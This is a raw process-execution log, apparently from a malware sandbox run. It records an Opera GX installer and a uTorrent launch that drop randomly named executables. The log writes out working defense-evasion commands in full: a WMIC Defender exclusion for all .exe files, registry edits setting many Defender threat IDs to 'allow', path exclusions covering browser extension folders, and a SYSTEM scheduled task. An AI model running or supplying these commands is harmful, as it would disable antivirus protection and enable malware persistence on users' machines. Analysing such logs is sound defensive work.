C:\Users\Admin\AppData\Local\Temp\7zS4462859E\setup.exe
"C:\Users\Admin\AppData\Local\Temp\7zS4462859E\setup.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --vought_browser=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera GX" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=0 --run-at-startup=1 --server-tracking-data=server_tracking_data --initial-pid=2684 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_20241115035520" --session-guid=aa2003d6-e906-4b9e-ae4d-56e7addc7336 --server-tracking-blob=YjZkOWQwMWM1ZGMyMWFkYWUyOTg1MGJlYzk0M2UzNTE0NTFiNmY4MDc2NjgzMzRkOWQ4YWY5YjEzZjg3Zjk2MDp7ImNvdW50cnkiOiJHQiIsImVkaXRpb24iOiJzdGQtMiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFHWFNldHVwLmV4ZSIsInByb2R1Y3QiOnsibmFtZSI6Im9wZXJhX2d4In0sInF1ZXJ5IjoiL29wZXJhX2d4L3N0YWJsZS9lZGl0aW9uL3N0ZC0yLz91dG1fc291cmNlPU9GVCZ1dG1fbWVkaXVtPXBiJnV0bV9jYW1wYWlnbj1vZ3gmJnV0bV9jb250ZW50PTM1MzE4Iiwic3lzdGVtIjp7InBsYXRmb3JtIjp7ImFyY2giOiJ4ODZfNjQiLCJvcHN5cyI6IldpbmRvd3MiLCJvcHN5cy12ZXJzaW9uIjoiMTEiLCJwYWNrYWdlIjoiRVhFIn19LCJ0aW1lc3RhbXAiOiIxNzMxNjQyOTE0LjI0ODAiLCJ1c2VyYWdlbnQiOiJNb3ppbGxhLzUuMCAoV2luZG93cyBOVCAxMC4wOyBXaW42NDsgeDY0KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvMTE4LjAuMC4wIFNhZmFyaS81MzcuMzYiLCJ1dG0iOnsiY2FtcGFpZ24iOiJvZ3giLCJjb250ZW50IjoiMzUzMTgiLCJtZWRpdW0iOiJwYiIsInNvdXJjZSI6Ik9GVCJ9LCJ1dWlkIjoiNDBlODYwNGQtYTQ0MC00OGRlLWIxM2YtNjQ5NTMyYWUxNmIyIn0= --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=DC05000000000000
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 2404 -ip 2404
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 2288
C:\Users\Admin\AppData\Local\Temp\7zS4462859E\setup.exe
C:\Users\Admin\AppData\Local\Temp\7zS4462859E\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktopGX --annotation=ver=114.0.5282.202 --initial-client-data=0x338,0x33c,0x340,0x308,0x344,0x6f6d8c5c,0x6f6d8c68,0x6f6d8c74
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 2404 -ip 2404
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1724
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2404 -ip 2404
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 2008
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2404 -ip 2404
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1812
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 2404 -ip 2404
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 2004
C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe
"C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe" "C:\Users\Admin\Documents\the-longing-codex.torrent" /SHELLASSOC
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\pNRn8PJQ\IFVII4XGy4B4o.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\pNRn8PJQ\IFVII4XGy4B4o.exe"
C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202411150355201\assistant\Opera_GX_assistant_73.0.3856.382_Setup.exe_sfx.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202411150355201\assistant\Opera_GX_assistant_73.0.3856.382_Setup.exe_sfx.exe"
C:\Users\Admin\AppData\Local\Temp\pNRn8PJQ\IFVII4XGy4B4o.exe
C:\Users\Admin\AppData\Local\Temp\pNRn8PJQ\IFVII4XGy4B4o.exe /VERYSILENT
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 2404 -ip 2404
C:\Users\Admin\AppData\Local\Temp\is-3M3MK.tmp\IFVII4XGy4B4o.tmp
"C:\Users\Admin\AppData\Local\Temp\is-3M3MK.tmp\IFVII4XGy4B4o.tmp" /SL5="$304D6,2448307,138752,C:\Users\Admin\AppData\Local\Temp\pNRn8PJQ\IFVII4XGy4B4o.exe" /VERYSILENT
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 2364
C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202411150355201\assistant\assistant_installer.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202411150355201\assistant\assistant_installer.exe" --version
C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202411150355201\assistant\assistant_installer.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202411150355201\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktopGX --annotation=ver=73.0.3856.382 --initial-client-data=0x2a4,0x2a8,0x2ac,0x280,0x2b0,0xdb4f48,0xdb4f58,0xdb4f64
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\oKIyrUJE\ZG2ecJn9.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 2404 -ip 2404
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 2220
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\oKIyrUJE\ZG2ecJn9.exe"
C:\Users\Admin\AppData\Local\Temp\oKIyrUJE\ZG2ecJn9.exe
C:\Users\Admin\AppData\Local\Temp\oKIyrUJE\ZG2ecJn9.exe /did=757674 /S
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 2404 -ip 2404
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1772
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 2404 -ip 2404
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1992
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m help.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bhzAbyJhiYArNEwhRY" /SC once /ST 03:56:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\oKIyrUJE\ZG2ecJn9.exe\" Y8 /pjudidxH 757674 /S" /V1 /F
C:\Users\Admin\AppData\Local\Temp\oKIyrUJE\ZG2ecJn9.exe
C:\Users\Admin\AppData\Local\Temp\oKIyrUJE\ZG2ecJn9.exe Y8 /pjudidxH 757674 /S
C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147914824\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147914824\" /t REG_SZ /d 6 /reg:64;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147914824 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147914824 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NOWTtjuGDiydC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NOWTtjuGDiydC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OMeOFycTU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OMeOFycTU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RnBNRnIwUzVU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RnBNRnIwUzVU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cXihOdOJPkHrzxTrZPR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cXihOdOJPkHrzxTrZPR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\kmKpunNFSNUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\kmKpunNFSNUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\TtvXSoLtbVXOCJVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\TtvXSoLtbVXOCJVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\VBkUndoRUYbskVcRK\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\VBkUndoRUYbskVcRK\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\rLJCaCpfIrfYjdgZ\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\rLJCaCpfIrfYjdgZ\" /t REG_DWORD /d 0 /reg:64;"
C:\ProgramData\uTorrent\utorrent9.exe
"C:\ProgramData\uTorrent\utorrent9.exe" /VERYSILENT
C:\Users\Admin\AppData\Local\Temp\is-5SD8N.tmp\utorrent9.tmp
"C:\Users\Admin\AppData\Local\Temp\is-5SD8N.tmp\utorrent9.tmp" /SL5="$3071E,832512,832512,C:\ProgramData\uTorrent\utorrent9.exe" /VERYSILENT
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NOWTtjuGDiydC" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NOWTtjuGDiydC" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NOWTtjuGDiydC" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OMeOFycTU" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OMeOFycTU" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RnBNRnIwUzVU2" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RnBNRnIwUzVU2" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cXihOdOJPkHrzxTrZPR" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cXihOdOJPkHrzxTrZPR" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kmKpunNFSNUn" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
